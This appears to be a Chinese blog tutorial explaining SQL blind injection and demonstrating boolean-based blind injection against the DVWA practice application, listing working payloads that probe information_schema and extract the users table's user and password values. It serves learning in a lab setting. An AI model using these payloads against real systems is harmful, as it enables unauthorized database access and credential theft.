当前位置:   article > 正文

SQl盲注原理及其简单演示_数字型盲注

数字型盲注

首先说下Sql盲注和Sql注入的区别:

盲注:获得不了过多的信息,没有详细内容;

普通注入:可以通过较为详细的内容来分析;

盲注概述:在sql注入过程中,SQL语句执行查询后,查询数据不能回显到前端页面中,我们需要使用一些特殊的方式来判断或者尝试,这个过程称为盲注。

盲注一般分为三种:

布尔盲注:页面只返回对或者错,存在或者不存在来判断

基于时间的盲注:通过页面沉睡时间来判断

报错的盲注:输入特定的语句使页面报错,网页回输出相关的错误信息;从而是我们想要的基本信息;

今天主要讲布尔盲注及其简单演示;

布尔盲注:(目的:理解过程和原理然后尝试去写脚本

基本思路和步骤:

  1. 判断是否存在注入,注入是字符型还是数字型;
  2. 猜解当前数据库名—>猜解数据库长度—>猜解数据库名称;
  3. 猜解数据库中的表名—>库中表的数量—>表的长度—>表的名称;
  4. 猜解表中的字段名—>表中字段的数量—>字段的长度—>字段的名称;
  5. 猜解数据并得到数据;

使用场景:(今天盲注所要用到的sql条件语句)

基于布尔值的盲注;

  1. 布尔盲注的简单条件语句

1' and length(database())=1 #(数据库长度是否为1

1' and ascii(substr(database(),1,1))>97 #(截取数据库名第一个字的ASCII值是否大于97

1' and (select count(table_name) from information_schema.tables where table_schema='dvwa')=1 #(统计dvwa库中是否有1个表

1' and length(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1))=1 #(dvwa库第一个表的长度是否为1

1' and ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1))>97 #(dvwa库中第一个表的第一个字符的ASCII值

1' and (select count(column_name) from information_schema.columns where table_name='users')=1 #(users表中是否有一个字段名

1' and length(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=1 #(users表中第一个字段名的长度是否为1

1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))>97 #(users表中第一个字段名的第一个字符的ASCII吗值是否大于97

1' and (ascii(substr((select user from users limit 0,1),1,1)))=97#(users表中的user字段的第一个字母的ASCII值是否为97

SQL盲注简单演示(基于PHP study数据库条件之下)

在做演示之前先打开low级别盲注的源码帮助我们理解

可看出返回值只有存在和不存在,可以简单判断为布尔盲注;

  • 判断是否存在注入,注入是字符型还是数字型;

依次输入1,2,3,4,56,(我只放了两截图)

 当输入6的时候返回值为missing,我们可以大概猜测出大概率为布尔盲注,因为返回值只有存在和不存在,

现在判断是否有注入点且分析为字符型还是数字型

输入1

输出结果为不存在,证明’已经拼接进去,且说明存在注入点,并且注入点就在1’后边的位置,现在进一步判断是字符型注入还是数字型注入

输入1 and 1=1

可以看出返回结果为存在,可以确定为字符型注入(不够确定可以输入1 and 1=2  看结果

  • 猜解当前数据库名—>猜解数据库长度—>猜解数据库名称

输入1' and length(database())=1 #(条件可以自行设定等于大于小于,只要语法不出错)

 可以看出库长度为4

然后猜解库名首字母

输入1' and ascii(substr(database(),1,1))>97 #(//将库名截取后转换为ASCII值来判断)(从这开始就用二分法一次次尝试 利用ASCII码值对应的字母来获得库名)

 (我只显示部分ASCII对应表完整的可以百度)

经过多次判别ASCII为100时存在 首字母为d(因为截图太多我这只出结果图)

  第二字母为v

 第三字母为w

 第四字母为a

由此得出库名dvwa

  • 猜解数据库中的表名—>库中表的数量—>表的长度—>表的名称

输入1' and (select count(table_name) from information_schema.tables where table_schema='dvwa')=1 #(//统计dvwa库中有几个表)

 当数量为2时输出正确,则库中有两个表

现在输入1' and length(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1))=1 # (显示第一个表名的长度)(这时候可以以自己的逻辑解决表名,用length ascii等函数均可,方法不唯一)

 现在可以得出第一个表为9个字符

第二个表为5个字符(这时侯我们就要对users(5)表password(8)表格外注意)

判断第二个表是不是为users表

输入1' and ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1))>97 #(来判断两个表的名字)

第二个表第一个字母为u

 第二个表第二个字母为s

 第三字母为e

 

第四字母为r

 第五字母为s

则得出这第二表名为users

  • 猜解表中的字段名—>表中字段的数量—>字段的长度—>字段的名称;

先猜解字段数量输入1' and (select count(column_name) from information_schema.columns where table_name='users')=1 #

 经过无数次实验后得到字段名的数量为8

现在确定字段名的长度输入1' and length(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=1 #

利用这个语句最终得出第四个字段为4个长度    第五个字段为8个长度

现在我们对这两个字段名称进行破解

输入1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))>97 #

得到第一个字段名为user

 中间由于截图太多就不过多演示最终得到第二个字段名为password

(五)猜解数据并得到数据;

输入1' and (ascii(substr((select user from users limit 0,1),1,1)))=97#

用来猜解user表中内容

。。。。。。等(我这边不过多演示,最终通过多演示得到user中的第一行admin)

同理输入1' and (ascii(substr((select password from users limit 0,1),1,1)))=97#

来得到密码

这里就不过多演示了

以上就是简单实验演示 和原理,希望大家多多指证!

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/小蓝xlanll/article/detail/139324?site
推荐阅读
相关标签
  

闽ICP备14008679号